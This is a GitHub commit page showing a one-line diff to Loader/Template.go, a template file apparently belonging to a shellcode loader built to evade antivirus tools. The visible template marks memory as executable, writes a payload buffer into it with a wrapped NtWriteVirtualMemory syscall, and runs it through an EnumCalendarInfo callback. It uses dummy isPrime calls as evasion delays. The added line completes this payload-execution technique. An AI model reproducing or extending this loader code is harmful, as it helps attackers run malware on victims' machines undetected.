Skip to content

Commit

Permalink
解决了部分bug
Browse files Browse the repository at this point in the history
  • Loading branch information
fdx-xdf committed May 1, 2024
1 parent 14c52fd commit 228a1a1
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions Loader/Template.go
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,7 @@ var __c__syscall_callback = `
isPrime(1000000000000002049);
VAV_NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x40, &oldProtect);
isPrime(1000000000000002049);
VAV_NtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);
`
var __c__syscall__earlyBird = `
Expand Down

0 comments on commit 228a1a1

Please sign in to comment.